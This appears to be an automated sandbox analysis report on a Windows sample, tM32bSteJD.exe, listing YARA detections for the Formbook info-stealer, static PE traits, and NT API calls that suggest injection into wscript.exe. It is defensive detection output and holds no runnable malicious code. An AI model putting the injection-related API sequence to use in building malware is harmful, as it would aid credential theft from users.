Source: Yara match	File source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: tM32bSteJD.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_0040604C
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_00404772
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 2_2_021A0A25
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00401030
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041D0D8
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00408C80
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041BD6B
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00402D8F
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00402D90
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00402FB0
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A620A0
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B020A8
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4B090
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B028EC
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AF1002
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A54120
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A3F900
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B022AE
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A6EBB0
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFDBD2
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B02B28
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4841F
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFD466
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A62581
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A4D5E0
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B025DD
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A30D20
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B02D07
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B01D55
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B02EF7
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A56E30
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00AFD616
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00B01FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A620A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B020A8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4B090
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B028EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4841F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62581
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4D5E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B025DD
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A30D20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3F900
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B02D07
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B01D55
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B022AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B02EF7
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A56E30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B01FF1
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFDBD2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B02B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7D0D8
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B62FB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B68C80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B62D90
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B62D8F
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_02B7BD6B

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: String function: 00A3B150 appears 35 times
Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 04A3B150 appears 35 times

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_004185E0 NtCreateFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00418690 NtReadFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00418710 NtClose,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_004187C0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_004185DB NtCreateFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041868A NtReadFile,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_0041870A NtClose,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A795D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A798A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79820 NtEnumerateKey,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A7B040 NtSuspendThread,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A799D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79950 NtQueueApcThread,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79A10 NtQuerySection,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A7A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Code function: 4_2_00A79B00 NtSetValueKey,
